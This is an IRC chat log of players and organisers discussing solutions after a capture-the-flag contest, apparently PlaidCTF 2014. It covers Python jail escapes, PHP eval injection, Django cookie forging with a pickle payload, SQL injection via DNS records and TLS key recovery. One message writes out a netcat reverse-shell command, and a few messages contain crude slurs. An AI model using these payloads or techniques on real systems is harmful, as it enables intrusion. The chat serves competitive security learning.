  10768. (16:29:31) ••• qUit: (whois) ([email protected]) Quit: Http://www.ZeroIRC.NET ¢Æ Zero IRC ¢Æ Ver 2.9
  10769. (16:29:34) (robbje) clockish: spq did it, yeah
  10770. (16:29:36) (abuss) ahhh
  10771. (16:29:37) ([pwn]Idolf) mserrano: what-the-shit.... that's not at ALL how we solved it :D
  10772. (16:29:47) ••• qUit: (DKay) (uid11914@gateway/web/irccloud.com/x-pslnfvcgkqlkagfl) Quit: Connection closed for inactivity
  10773. (16:30:01) (clockish) [pwn]Idolf: what did you do?
  10774. (16:30:02) ([pwn]Idolf) mserrano: I'm considering sharing the exploit, but that would ruin a CTF-problem I'm designing :P
  10775. (16:30:03) (geobot) priv escalation vulnerabilities ruin it all
  10776. (16:30:05) ••• jOin: (Pause) ([email protected])
  10777. (16:30:13) (@mserrano) [pwn]Idolf: lol
  10778. (16:30:15) (+tylerni7) [pwn]Idolf: awww
  10779. (16:30:22) (@mserrano) I thought we would finally kill python jails
  10780. (16:30:23) (abuss) I was reading all the /proc/self/ stuff but only tried to write to mem
  10781. (16:30:23) (+tylerni7) [pwn]Idolf: just share it with us then ;)
  10782. (16:30:28) (@mserrano) with last year and this year
  10783. (16:30:44) (+dickoff) inter: mak` I'll bring it back in some fashion next year
  10784. (16:30:45) ••• jOin: (morgan_z) ([email protected])
  10785. (16:30:57) (+dickoff) doing videos is way more annoying than music
  10786. (16:31:08) ([pwn]Idolf) mserrano: well, I guess your solution is more general... but WHAT IF WE DIDN'T EVEN HAVE STDOUT?!? :D
  10787. (16:31:08) (muchacho) mserrano, how do you call "someshit"-file in kpop? What is the path?
  10788. (16:31:12) (Pitr_) we need more perl chals
  10789. (16:31:15) ••• qUit: (PauseSave) ([email protected]) Ping timeout: 245 seconds
  10790. (16:31:23) (@mserrano) muchacho: you don't need to call a file
  10791. (16:31:23) ••• qUit: (c1l0) ([email protected]) Ping timeout: 276 seconds
  10792. (16:31:24) (+tylerni7) Pitr_: that can be arranged
  10793. (16:31:25) (sven) i want more non-x86 pwnables
  10794. (16:31:28) (clockish) [pwn]Idolf: I for one am super curious what you did :)
  10795. (16:31:33) (robbje) ban Pitr_
  10796. (16:31:33) (asmoday) IPV6
  10797. (16:31:34) (Tapyroe__) any one want to briefly tell me how to solve mt pox? XD
  10798. (16:31:34) (robbje) :>
  10799. (16:31:35) (@mserrano) muchacho: in fact it doesn't successfully write to that file
  10800. (16:31:35) (+tylerni7) sven: we'll see... that requires not EC2 for hosting
  10801. (16:31:37) (Pitr_) great!
  10802. (16:31:46) (abuss) oh I also wanted to say that I liked reekeeee
  10803. (16:31:49) (jix) or nen x86 reversing
  10804. (16:31:50) (sven) tylerni7: qemu on ec2 should work :)
  10805. (16:31:50) (abuss) it felt like a really solid web problem
  10806. (16:31:51) (@mserrano) muchacho: instead it uses preg_replace("/stuff/e", "phpcode()")
  10807. (16:31:57) (clockish) [pwn]Idolf: Given that I wrote the chall and couldn't find any other holes...
  10808. (16:32:00) (+tylerni7) sven: well.. qemu isn't the best
  10809. (16:32:03) • Pitr_ trapt robbje in zijn ballen :D
  10810. (16:32:10) (Sin__) Tapyroe__, hash length extension
  10811. (16:32:19) (hammerpig) many thanks for ctf
  10812. (16:32:20) ••• qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Quit: leaving
  10813. (16:32:28) (sven) tylerni7: ah, fair enough. it probably requires quite some cpu power if all people are trying to pwn it at the same time
  10814. (16:32:35) (mibbit_19028) tiffany was a pain all that antidebugging!
  10815. (16:32:41) ••• jOin: (alex___) (b2c22e8b@gateway/web/freenode/ip.178.194.46.139)
  10816. (16:32:42) (+tylerni7) also annoying qemu bugs sometimes crop up
  10817. (16:32:43) ([pwn]Idolf) clockish: ok, sure... I'll upload it not
  10818. (16:32:48) (muchacho) mserrano, ah k damnit, thx!
  10819. (16:33:09) (Tapyroe__) Sin__: thanks!
  10820. (16:33:17) ([pwn]Idolf) clockish: https://gist.github.com/anonymous/dff51e9ec27deb828e1d
  10821. (16:33:24) (Pitr_) & thanks again, see you next year!
  10822. (16:33:47) (@mserrano) [pwn]Idolf: ok, so you used a code object
  10823. (16:33:47) (@mserrano) ok
  10824. (16:34:01) (inter) tylerni7 so what was the solution to rsa?
  10825. (16:34:02) (clockish) [pwn]Idolf: oh, a code object. Yeah, that was another way to do it.
  10826. (16:34:07) (inter) i had a chunk of code for it
  10827. (16:34:09) (inter) but didnt work
  10828. (16:34:12) (@mserrano) inter: there's a paper
  10829. (16:34:17) (@mserrano) they have a description of an algorithm
  10830. (16:34:17) (clockish) [pwn]Idolf: good work!
  10831. (16:34:22) (@mserrano) either find an implementation or write one
  10832. (16:34:23) (@mserrano) obtain flag
  10833. (16:34:27) (+tylerni7) inter: well... I wrote code from scratch... there is source that mostly works online though :(
  10834. (16:34:30) (+tylerni7) that I didn't know about (:
  10835. (16:34:31) (inter) r
  10836. (16:34:32) (inter) o
  10837. (16:34:33) (inter) f
  10838. (16:34:33) (+tylerni7) :(*
  10839. (16:34:33) (inter) l
  10840. (16:34:33) ••• qUit: (makler2004) ([email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
  10841. (16:34:42) (inter) aint nobody got time fo dat
  10842. (16:34:42) (inter) jk
  10843. (16:34:51) (inter) i sometimes wish i was black female
  10844. (16:34:53) (inter) so i can say that
  10845. (16:34:55) (inter) no racism
  10846. (16:35:02) ••• jOin: (Zibro) ([email protected])
  10847. (16:35:02) (clockish) [pwn]Idolf: code obj is the more leet way to do it :)
  10848. (16:35:33) ([pwn]Idolf) clockish: /proc/self/mem was one of the first things I tried :/
  10849. (16:35:57) (clockish) [pwn]Idolf: yeah, I thought more people would use proc/self/mem because it is easier.
  10850. (16:35:59) (inter) clockish: your challs require too much creativity
  10851. (16:36:07) (clockish) inter: :D
  10852. (16:36:10) (inter) its too much for non-cs major kid
  10853. (16:36:11) (inter) :/
  10854. (16:36:15) ••• qUit: (Hertle) ([email protected]) Ping timeout: 245 seconds
  10855. (16:36:33) (clockish) [pwn]Idolf: yeah, you need f = file('/proc/self/mem', 'r+b', 0); f.seek(i); x=f.read(l) to make it work
  10856. (16:36:47) (abuss) 0 for unbuffered?
  10857. (16:36:55) (clockish) abuss: yes
  10858. (16:36:59) ([pwn]Idolf) clockish: when it didn't work initially, I found somewhere on the web that said you apparently couldn't do it :/
  10859. (16:37:09) (jjk_) to the zfs - i constructed a new uberblock pointing to newer blocks and used ufs explorer to extract the data (as it ignores the checksums)
  10860. (16:37:10) (@mserrano) it depends on your system :(
  10861. (16:37:11) (clockish) [pwn]Idolf: :/
  10862. (16:37:14) ([pwn]Idolf) I tried "rwb"
  10863. (16:37:21) (@mserrano) jjk_: that was the intended solution :)
  10864. (16:37:29) (+dickoff) so how big of a party is 0xffa throwing?! _blasty_, ius, iZsh, etc
  10865. (16:37:33) ••• qUit: (mibbit_19028) (4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150) Quit: mibbit_19028
  10866. (16:37:41) (clockish) [pwn]Idolf: yeah, it works on every machine I've tried it on, except for mserrano's :P
  10867. (16:37:51) ••• qUit: (random_user_23) (5d6846fd@gateway/web/freenode/ip.93.104.70.253) Quit: Page closed
  10868. (16:37:56) (@mserrano) yeah it fails on my droplet
  10869. (16:38:11) ([int3]romansoft) jjk_: can you elaborate on that? (zfs)
  10870. (16:38:13) ••• mOde: (mserrano) sets (+v clockish)
  10871. (16:38:15) ••• mOde: (mserrano) sets (-o mserrano)
  10872. (16:38:34) (jjk_) mserrano: it took me a while to notice the uber-corruption in challenge description :)
  10873. (16:38:57) ••• qUit: (Pause) ([email protected])
  10874. (16:39:07) (mak`) jjk_: im zfs n00b could you elaborate?
  10875. (16:39:08) (poppopret) anyone got a g++ writeup?
  10876. (16:39:13) (+tylerni7) poppopret: well
  10877. (16:39:15) (+cai_) thanks for leaving feedback. they greatly help us to improve pctf every year :)
  10878. (16:39:25) (+tylerni7) basically it does matrix multiplication on your key over gf(257)
  10879. (16:39:32) (+cai_) if you haven't done it yet, please take our survey: http://bit.ly/1ifQBOo
  10880. (16:39:39) (+dickoff) ^^^
  10881. (16:39:45) (mak`) i was trying to find metadata like here: http://www.joyent.com/blog/zfs-forensics-recovering-files-from-a-destroyed-zpool
  10882. (16:39:54) (+tylerni7) poppopret: not quite a writeup, but yeah that's how it verified your key
  10883. (16:39:55) (inter) anyways
  10884. (16:39:59) (mak`) but find only zap with file names and id
  10885. (16:40:02) (inter) i has my writeup in very very short point form
  10886. (16:40:15) (mak`) and there was no data in dnode tables
  10887. (16:40:18) (mak`) at this id
  10888. (16:40:20) (jjk_) i can recommend ondiskformat.pdf for zfs structure
  10889. (16:40:24) (poppopret) ahhh
  10890. (16:40:24) (poppopret) ok
  10891. (16:40:25) (inter) gg is gay
  10892. (16:40:28) (poppopret) thanks tyler
  10893. (16:40:29) ••• qUit: (sibios) (~sibios@unaffiliated/sibios) Quit: Leaving
  10894. (16:40:35) (+clockish) poppopret: some people (incl me!) solved it by making the C++ more readable, and then noticing the key can be brute forced 4 bytes at a time.
  10895. (16:40:35) (+tylerni7) poppopret: I'm sure someone will post a better writeup for it
  10896. (16:40:37) (mak`) yeah was reading it
  10897. (16:40:50) ••• jOin: (c1l0) ([email protected])
  10898. (16:40:51) (irctc736) anyone has a writeup on bronies?
  10899. (16:40:54) (foundation) tylerni7: please tell me you didn't write that by hand
  10900. (16:40:56) (Sin__) clockish, was there a better way ?
  10901. (16:41:01) (+tylerni7) foundation: I... did
  10902. (16:41:04) ••• qUit: (AnthraX101) ([email protected])
  10903. (16:41:08) (+tylerni7) iteratively, but by hand
  10904. (16:41:12) (inter) clockish: yep 4 bytes a type
  10905. (16:41:22) (+cai_) we'll soon make a page that lists all the write-ups submitted to us (via email or dropped in IRC)
  10906. (16:41:23) (+clockish) Sin__: for g++? yeah, read the code and understand that it's GF(207)
  10907. (16:41:26) (+clockish) But math is hard.
  10908. (16:41:28) (jjk_) mak`, [int3]romansoft and here is my ugly python code to find uberblocks - http://pastebin.com/Y14B2RAh
  10909. (16:41:29) (inter) pos 0,4,8,12
  10910. (16:41:32) (Sin__) it is
  10911. (16:41:32) (inter) but then
  10912. (16:41:34) (jmgrosen) so, how do you do bronies part 1? that's been bothering me
  10913. (16:41:34) (poppopret) where do we submit writeups to?
  10914. (16:41:35) (inter) i misread
  10915. (16:41:37) (inter) 1 as l
  10916. (16:41:38) (inter) or
  10917. (16:41:39) (sven) "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
  10918. (16:41:39) (inter) l as 1
  10919. (16:41:42) (inter) and lost the breakthru
  10920. (16:41:43) (inter) fuckkk
  10921. (16:41:46) (+clockish) Sin__: So i'd say brute force is actually the better solution :P
  10922. (16:41:49) (jjk_) and the missing blocks
  10923. (16:41:50) (abuss) cai_, fixed mine: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
  10924. (16:41:55) (shabgrd) I think half the world solved crypto 20 expect for me :(
  10925. (16:41:55) ([int3]romansoft) cai_: for next year, a simple board that lets up read the problems and send the flags. No more is needed.
  10926. (16:41:56) (geobot) oo i like skier_ too late to make friends at the ai is littered with you have a lot of simple binaries(no arm, x86-32)
  10927. (16:42:07) (poppopret) where do we submit writeups to?
  10928. (16:42:17) (+tylerni7) [int3]romansoft: it's what happens when we try to innovate :(
  10929. (16:42:29) (abuss) Hmm I liked the fancy board and the voting mechanics
  10930. (16:42:31) (+clockish) poppopret: nothing PPP official, but there's a CTFs writeups github that aggregates writeups
  10931. (16:42:39) (poppopret) ok
  10932. (16:42:41) ([pwn]Idolf) clockish: the main reason our exploit didn't work? We had a '|' instead of a 'd'
  10933. (16:42:43) (phiber__) innovating is fine, but please have a fallback simple interface
  10934. (16:42:44) (abuss) it worked surprisingly well across my devices
  10935. (16:42:47) (+cai_) [int3]romansoft: you might actually get that. i'm quitting after this one is wrapped up.
  10936. (16:42:47) (+mserrano) [pwn]Idolf: awwwwww
  10937. (16:43:02) (+tylerni7) poppopret: if you put them in here we'll try to keep up with them
  10938. (16:43:06) ••• qUit: (alex___) (b2c22e8b@gateway/web/freenode/ip.178.194.46.139) Ping timeout: 240 seconds
  10939. (16:43:11) ([pwn]Idolf) mserrano: ok, I'll stop whining now and go to bed :P
  10940. (16:43:14) (+tylerni7) cai_: <3
  10941. (16:43:17) (+tylerni7) :(
  10942. (16:43:33) (phiber__) I didn't know you could switch the board to see more problems until 8h passed
  10943. (16:43:41) (upb) abuss: "This is the form of a signed, timestamped data cookie. The period at the beginning of the string indicates that the cookie is zlib-compressed, " <- Is that standard for some framework or?
  10944. (16:43:51) ••• jOin: (deject3d) ([email protected])
  10945. (16:43:53) (+tylerni7) upb: yeah, standard for django
  10946. (16:43:56) (upb) ah
  10947. (16:43:56) (+tylerni7) maybe more as well
  10948. (16:43:59) (abuss) upb, I had just spent a while on reekeee
  10949. (16:44:02) (abuss) which was very similar
  10950. (16:44:06) (phiber__) the mourse cursor doesn't change when hovering over any clickable thing
  10951. (16:44:08) (deject3d) what was the solution to reekee anyway
  10952. (16:44:11) (jmgrosen) anyone have a writeup of part 1 of bronies up yet?
  10953. (16:44:12) (deject3d) or at least where was the flag
  10954. (16:44:14) (iago-x86) I just realized I haven't eaten today :)
  10955. (16:44:19) (Dumpling) https://github.com/isislab/CTF-Solutions/tree/master/PCTF_2014 <- solutions for mtpox, kpop, and kappa
  10956. (16:44:21) (abuss) deject3d, after getting the secrets.py
  10957. (16:44:24) (abuss) you can forge cookies
  10958. (16:44:25) ••• qUit: (zTrix_) (~zTrix@2402:f000:d:8001:2969:4da7:2b93:32a0) Quit: WeeChat 0.4.3
  10959. (16:44:27) (LuckyY) phiber__: +1
  10960. (16:44:28) (abuss) it took me a while to get it to work
  10961. (16:44:31) (deject3d) yeah i never got my cookies to work
  10962. (16:44:41) (abuss) cause I didn't notice django had their own b64_decode that tweaked padding
  10963. (16:45:05) (deject3d) humph
  10964. (16:45:12) (deject3d) i tried for so long to get a cookie to work
  10965. (16:45:13) (deject3d) oh well
  10966. (16:45:17) (abuss) then you assemble a pickle that calls os.system('nc -e /bin/bash/ server port')
  10967. (16:45:24) ••• jOin: (phiber) ([email protected])
  10968. (16:45:37) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  10969. (16:45:38) (abuss) and use the shell to run a program on a file that spits the key
  10970. (16:45:38) (geobot) sweet, i'm finally getting out about ctf and change it in donald glover, it spits out that some of us are going to open source code for about pony porn warez
  10971. (16:45:42) (phiber) the mourse cursor doesn't change when hovering over any clickable thing
  10972. (16:45:43) (deject3d) ah damn
  10973. (16:45:44) (phiber) so it was really hard to notice the board was interactive
  10974. (16:46:19) (abuss) agree with phiber, changing the mouse cursor when over something clickable would have been nice
  10975. (16:47:16) (+awesie) phiber abuss: i agree, forgot about that; UX is hard when you are the designer / developer / tester
  10976. (16:47:21) (mischa__) whatscat writeups available?
  10977. (16:47:41) ([CISSP]HoLyVieR) mscha__: check the reset password feature
  10978. (16:47:53) ([CISSP]HoLyVieR) mischa__: there's a SQLi in there
  10979. (16:48:00) (Dumpling) sqli via your rdns?
  10980. (16:48:01) ••• jOin: (ijonas) (534e453a@gateway/web/freenode/ip.83.78.69.58)
  10981. (16:48:06) ([CISSP]HoLyVieR) no the username
  10982. (16:48:08) (Sin__) via username
  10983. (16:48:27) (phiber) I did sqli via rdns records
  10984. (16:48:29) ••• qUit: (phiber__) ([email protected]) Ping timeout: 252 seconds
  10985. (16:48:30) (tsuro) damn, we did it via rdns :)
  10986. (16:48:42) (+tylerni7) rdns was probably easier
  10987. (16:48:46) (phiber) much easier than blind sqli on username
  10988. (16:48:48) (+tylerni7) yeah
  10989. (16:48:49) (xp45g) via rdns O_o
  10990. (16:48:51) (mischa__) we had a sqli in our TXT record
  10991. (16:48:52) (abuss) phiber, huh that's cool
  10992. (16:49:09) ([CISSP]HoLyVieR) username was a pain to exploit tough 64 caracters limit :/
  10993. (16:49:16) (abuss) which provider lets you screw with rdns like that?
  10994. (16:49:22) (fester) he.net
  10995. (16:49:31) (xp45g) i used username to test one flag char at a time
  10996. (16:49:43) (abuss) ah
  10997. (16:49:44) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  10998. (16:49:45) (xp45g) if test was successful the query would reset pass for my 2nd account
  10999. (16:49:47) (KT) btw who is 0xffa?
  11000. (16:49:47) ••• qUit: ([pwn]Idolf) ([email protected]) Ping timeout: 240 seconds
  11001. (16:49:51) (fester) actually, you just need a rdns to point to a valid dns, it looks up all records of the dns entry (even txt)
  11002. (16:49:55) (phiber) abuss, your provider usually only lets you change the rdns entry
  11003. (16:49:57) (+mserrano) KT: eindbazen + fail0verflow
  11004. (16:50:00) ••• qUit: (ltfish) ([email protected]) Ping timeout: 240 seconds
  11005. (16:50:01) (phiber) so you point that to a host you control
  11006. (16:50:04) ••• jOin: (skuu) ([email protected])
  11007. (16:50:09) (phiber) and a dns server you control
  11008. (16:50:09) (KT) mserrano: oh, i see, thx
  11009. (16:50:11) (Guest17539) is there any writeup for hudak?
  11010. (16:50:16) ••• qUit: (_simo) ([email protected]) Quit: segfault at 7fff1ebe5000 ip 000000000041274b sp 00007fff1ebe32f8 error 6
  11011. (16:50:28) (inter) looking for solutions to tenement
  11012. (16:51:09) (iZsh) tylerni7: there is an easier way for curlcore
  11013. (16:51:36) ••• qUit: (Saxophie) ([email protected]) Quit: WeeChat 0.3.7
  11014. (16:51:38) ••• qUit: ([pwn]poizan42) ([email protected]) Ping timeout: 258 seconds
  11015. (16:51:39) (+tylerni7) iZsh: how'd you do it?
  11016. (16:51:42) (iZsh) tylerni7: you get the sessionID from wireshark, you search for this, and the masterkey is just before that key, then you feed that to wireshark and that's it
  11017. (16:51:42) (fester) i asked my provider to change my rdns txt entry and they marked my vps as 'High Risk'
  11018. (16:51:52) (Reinhart) mserrano: we ended up solving it using the slide attack, but also had a brute forcer running that ended up finding the flag while I was sleeping
  11019. (16:51:55) (ciliated) how to solve doge_stage?
  11020. (16:52:04) (+tylerni7) iZsh: ah, interesting
  11021. (16:52:05) (iZsh) tylerni7: that's why it took like a few minutes to solve :)
  11022. (16:52:06) ••• jOin: (___Sin) ([email protected])
  11023. (16:52:13) (plaintext) we solved doge by sorting the palette by number of pixels that have that color
  11024. (16:52:16) (plaintext) and changing the top N to black
  11025. (16:52:17) (+clockish) ciliated: one way is to randomize the palate colors
  11026. (16:52:18) (+mserrano) Reinhart: hehe
  11027. (16:52:20) (plaintext) the key starts appearing
  11028. (16:52:26) (+clockish) plaintext: yep
  11029. (16:52:28) (corpille) gimp -> map ;)
  11030. (16:52:28) ([CISSP]HoLyVieR) at 127 to 208
  11031. (16:52:33) (+mserrano) next time I will make the blocks bigger
  11032. (16:52:35) (+mserrano) so that that doesn't work
  11033. (16:52:39) (ciliated) thanks
  11034. (16:52:43) (inter) real
  11035. (16:52:51) (inter) [14:52] <+mserrano> next time I will make the blocks bigger
  11036. (16:52:57) (D3AdCa7_) I solve doge by divide that image into two...
  11037. (16:53:11) (+mserrano) inter: 3 bytes is not that many bytes
  11038. (16:53:19) (inter) you could have 1
  11039. (16:53:28) ([CISSP]HoLyVieR) change the color of palette from 127 to 208 to black and rest white and it gives the text
  11040. (16:53:29) (abuss) were there any solutions to halpjs that didn't involve string tricks?
  11041. (16:53:31) ••• jOin: (bool_101) ([email protected])
  11042. (16:53:49) (+mserrano) abuss: not afaik
  11043. (16:53:51) (abuss) more to the point, were there any x besides 1 and 6 such that mystop(x) == x?
  11044. (16:53:53) (Rinko) a random shuffle on the palette works well though
  11045. (16:53:58) (abuss) ah
  11046. (16:53:59) (plaintext) it's impossibru without string ticks
  11047. (16:54:03) (inter) o
  11048. (16:54:03) (inter) btw
  11049. (16:54:04) (plaintext) you need 3 different values map to themselves
  11050. (16:54:05) (inter) mserrano,
  11051. (16:54:07) (inter) how did you guys
  11052. (16:54:10) (abuss) okay that's a bit comforting then :P
  11053. (16:54:16) (inter) manage to fix the server load
  11054. (16:54:21) (inter) in the early stage of ctf?
  11055. (16:54:22) (+mserrano) inter: I honestly have no idea
  11056. (16:54:25) (inter) im more interested in that
  11057. (16:54:33) (Reinhart) mserrano: this solved it purely by bruteforce in ~6hrs or so https://p.6core.net/p/hoVp1HHotIIKVpVBTyL1xRJ8
  11058. (16:54:35) ••• qUit: (bool101) ([email protected]) Ping timeout: 245 seconds
  11059. (16:54:36) (+mserrano) the relevant people worked magic the way they always do
  11060. (16:54:37) (phiber) crypto parlor was hash length extension right?
  11061. (16:54:51) ••• jOin: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3)
  11062. (16:55:12) (+mserrano) phiber: yes
  11063. (16:55:16) (+tylerni7) inter: cai_ and awesie worked their magic
  11064. (16:55:23) (Tapyroe__) Reinhart: which problem was that for?
  11065. (16:55:23) (jmgrosen) Dumpling: did you write those write-ups?
  11066. (16:55:23) (inter) OHH
  11067. (16:55:33) (phiber) I didn't have enough time to code everything
  11068. (16:55:35) (Dumpling) jmgrosen: two out of the three
  11069. (16:55:37) (+mserrano) yeah
  11070. (16:55:48) (+mserrano) there's like some rule of the universe that says that everything must go wrong on friday at 5 pm
  11071. (16:55:53) (jmgrosen) Dumpling: could you explain kpop? I don't get how the system() call is getting eval'd
  11072. (16:55:55) (+mserrano) and then magic happens and it eventually gets fixed
  11073. (16:55:56) (deject3d) where was the flag for whatscat? was it in the database?
  11074. (16:56:00) ••• qUit: (Sin__) ([email protected]) Ping timeout: 240 seconds
  11075. (16:56:01) (+awesie) inter: tl;dr once caching was working correctly and the wsgi servers stopped acting weird, load was less of an issue
  11076. (16:56:02) (Reinhart) Tapyroe__: wheeee
  11077. (16:56:08) (phiber) also I got up to $64K playing manually lol
  11078. (16:56:17) (+cai_) inter: awesie will post some notes on that on our blog
  11079. (16:56:21) (Dumpling) jmgrosen: preg_replace has a /e flag for dynamic replacements and stuff, it basically evals code
  11080. (16:56:29) (corpille) what was tenement ?
  11081. (16:56:39) (robbje) corpille: egghunting shellcode
  11082. (16:56:42) (jmgrosen) Dumpling: ........wow, that's pretty ridiculous o_O
  11083. (16:56:42) (Reinhart) Tapyroe__: but as I said, we solved it using the slide attack before this brute forcer finished
  11084. (16:56:47) • jmgrosen reminds himself never to use php
  11085. (16:56:54) (abuss) I was going to script parlor to keep betting the farm on 2^20 odds, which would've required 500,000 requests or so
  11086. (16:57:02) (Tapyroe__) ah right, Reinhart! thanks :) dont think I even tried wheeee
  11087. (16:57:04) (corpille) egghunting shellcode mmm ... okay :)
  11088. (16:57:12) (abuss) it was going too slowly, but did anyone else manage that?
  11089. (16:57:26) ••• jOin: (lkwpeter) ([email protected])
  11090. (16:57:34) (deject3d) whatscat was a sql injection but was the flag stored in a file? were file perms on or anything?
  11091. (16:57:36) ••• qUit: (irctc736) (806f3006@gateway/web/freenode/ip.128.111.48.6) Ping timeout: 240 seconds
  11092. (16:57:36) ••• qUit: (lkwpeter) ([email protected]) Client Quit
  11093. (16:58:02) ([CISSP]HoLyVieR) deject3d: I heard it was in "flag" table
  11094. (16:58:03) (geobot) his dinner table x|
  11095. (16:58:08) (xp45g) deject3d: flag was in the db
  11096. (16:58:40) (iZsh) O.o about https://twitter.com/HacknamStyle/status/455453769824612352
  11097. (16:58:41) (spq) hm, i didnt know we can still write into /dev/mem (for python jail) solved it completely within python (python function opcodes -> libc system("/bin/sh") )
  11098. (16:59:07) (abuss) NICE
  11099. (16:59:25) (Dumpling) spq: got a writeup for that?
  11100. (16:59:25) (inter) does any of you know solutions to curlcore?
  11101. (16:59:34) (iZsh) hijacking the support email is a nice way to get hints ;-)
  11102. (16:59:37) (deject3d) anyone have a brony writeup?
  11103. (16:59:38) (spq) Dumpling: not ready :D
  11104. (16:59:40) (Rinko) btw does "hudak" refers to Paul Hudak? closure and lazy evaluation everywhere in this problem
  11105. (16:59:45) (phiber) I tried replacing function bytecode, but if I replaced it with something that imported os it failed
  11106. (16:59:45) (+mserrano) Rinko: yes.
  11107. (16:59:47) (plaintext) yep
  11108. (16:59:48) (___Sin) iZsh, that's so nasty
  11109. (16:59:55) (plaintext) we only figured out that hint in the end
  11110. (16:59:58) (phiber) anyone did it that way?
  11111. (16:59:58) (+mserrano) phiber: we held an import lock
  11112. (17:00:00) (plaintext) hudak was a nice task btw
  11113. (17:00:06) (+mserrano) phiber: so you couldn't import anyway
  11114. (17:00:13) (inter) phiber: acquire_lock()
  11115. (17:00:19) (phiber) oh
  11116. (17:00:31) (inter) but
  11117. (17:00:37) (inter) does anyone know solutions to curlcore?
  11118. (17:00:44) (iZsh) inter: yes
  11119. (17:00:51) (inter) iZsh: may i pm you :D
  11120. (17:00:54) (+mserrano) inter: find the aes keys, decrypt the traffic, get flag
  11121. (17:01:02) (inter) well
  11122. (17:01:02) (iZsh) mserrano: easier way :)
  11123. (17:01:05) (inter) i looked for
  11124. (17:01:08) (inter) temporary ssl keys
  11125. (17:01:11) (inter) in corefile
  11126. (17:01:12) (phiber) I also thought about writing to /self/mem but I was too busy on other challenges
  11127. (17:01:13) ••• qUit: (ciliated) (99bd4541@gateway/web/freenode/ip.153.189.69.65) Quit: Page closed
  11128. (17:01:14) ••• jOin: (phreeek) ([email protected])
  11129. (17:01:15) ••• qUit: (obvi0us) ([email protected]) Remote host closed the connection
  11130. (17:01:18) (inter) but i didnt find any patterns
  11131. (17:01:29) (inter) what was the methods to find the aes key in the corefile?
  11132. (17:01:30) (phiber) there were too many challenges
  11133. (17:01:41) (iZsh) inter: you can open it in wireshark, look at the SessionID, search for it in a hex editor in the dump, just before that, you'll have the size of the sessionid, and then before that, the masterkey
  11134. (17:01:41) (geobot) and the masterkey is just before
  11135. (17:01:54) (inter) open corefile?
  11136. (17:02:02) (phreeek) mserrano: one question to kpop, I got only a 500 error with your payload
  11137. (17:02:04) (inter) oh
  11138. (17:02:05) (inter) nvm
  11139. (17:02:06) (inter) OHH
  11140. (17:02:07) (inter) okay
  11141. (17:02:08) (iZsh) inter: then you write a file called key.txt which contains the sessionid and the masterkey and you can feed that to wireshark for decryption
  11142. (17:02:08) (inter) wow
  11143. (17:02:27) (inter) damn
  11144. (17:02:44) (inter) it feels like a hammer just slammed my face to the floor
  11145. (17:02:57) (inter) thanks iZsh :D
  11146. (17:02:58) (iZsh) that one was fast to solve :)
  11147. (17:03:04) (inter) well
  11148. (17:03:10) (inter) my brain was already tortured by misc250 and pyjail
  11149. (17:03:24) (inter) n0sleep.tv
  11150. (17:03:25) (plaintext) damn, who handles the Plaid twitter acc?
  11151. (17:03:31) (plaintext) i made a mistake with my writeup :8
  11152. (17:03:40) (foundation) http://pastebin.com/3Kw2HZjP patch for tor for rendezvous
  11153. (17:03:48) (inter) yeah
  11154. (17:03:49) (inter) i knew
  11155. (17:03:51) (inter) what i wanted to do
  11156. (17:04:03) (inter) but i couldnt find the function get_node_by_name or something
  11157. (17:04:16) (inter) i tried hardcoding to fill out the structs
  11158. (17:04:19) (inter) but i failed LOL
  11159. (17:04:40) (dwn) how were we suppsoed to guess there was a flags table in whatscat ;_;
  11160. (17:04:41) (foundation) took a while
  11161. (17:04:54) (dwn) also that box has the slowest updating dns cache
  11162. (17:05:06) ••• qUit: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139) Ping timeout: 240 seconds
  11163. (17:05:07) (inter) at least i learned 2 things today
  11164. (17:05:19) (inter) 1. dont eat overnight chinese food
  11165. (17:05:28) (NK_) tylerni7 / cai_ well done, it was great
  11166. (17:05:31) (NK_) :)
  11167. (17:05:44) (inter) 2. buy ida
  11168. (17:05:51) (Adran) 1. seems like poor life choice
  11169. (17:05:59) (inter) well
  11170. (17:06:05) (chuckleberry) foundation: nice!
  11171. (17:06:07) (inter) some of the ppps
  11172. (17:06:14) (inter) ate overnight chinese food
  11173. (17:06:19) (inter) so i decided to do that as well
  11174. (17:06:25) (Adran) is that why we had a massive netsplit?!
  11175. (17:06:30) (inter) and as it turned out i like overnight pho better
  11176. (17:06:35) (Adran) the servers ate old Chinese food?
  11177. (17:06:44) ••• jOin: (chrissing) ([email protected])
  11178. (17:06:45) (robbje) want zfs writeup
  11179. (17:06:46) (phiber) dwn, custom dns server with twisted and ttl=0 FTW
  11180. (17:06:54) (jix) foundation: I gave up following this async spaghetti mess
  11181. (17:06:56) (dwn) phiber: how do you set that up
  11182. (17:06:59) (sven) "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
  11183. (17:07:02) (sven) robbje: ^--
  11184. (17:07:04) (Adran) phiber: what did you use that for?
  11185. (17:07:06) (jix) foundation: instead I patched the bandwidth + weight calculation
  11186. (17:07:11) (dwn) would like to see a writeup on that, lol, phiber
  11187. (17:07:12) (inter) https://www.youtube.com/watch?v=WXX8MsT7v9M
  11188. (17:07:17) (jix) foundation: to make chandler the #1 candidate for everything
  11189. (17:07:17) (phiber) Adran, whatscat
  11190. (17:07:20) ••• qUit: (Gut_) (uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw) Quit: Connection closed for inactivity
  11191. (17:07:23) (upb) < dwn> how were we suppsoed to guess there was a flags table in whatscat ;_; <- haha, i gave up on that aswell, thought about reading out information_schema.tables but php munges . in txt record value for some reaosn
  11192. (17:07:25) (plaintext) who is in charge of the plaid twitter?
  11193. (17:07:26) (inter) cai_: when i ran into obstacles i listened to this
  11194. (17:07:27) (Adran) phiber: got a writeup?
  11195. (17:07:33) (_blasty_) ricky: tylerni7: mserrano: how much longer is bronies going to be up ?
  11196. (17:07:34) (inter) it magically calmed me down lul
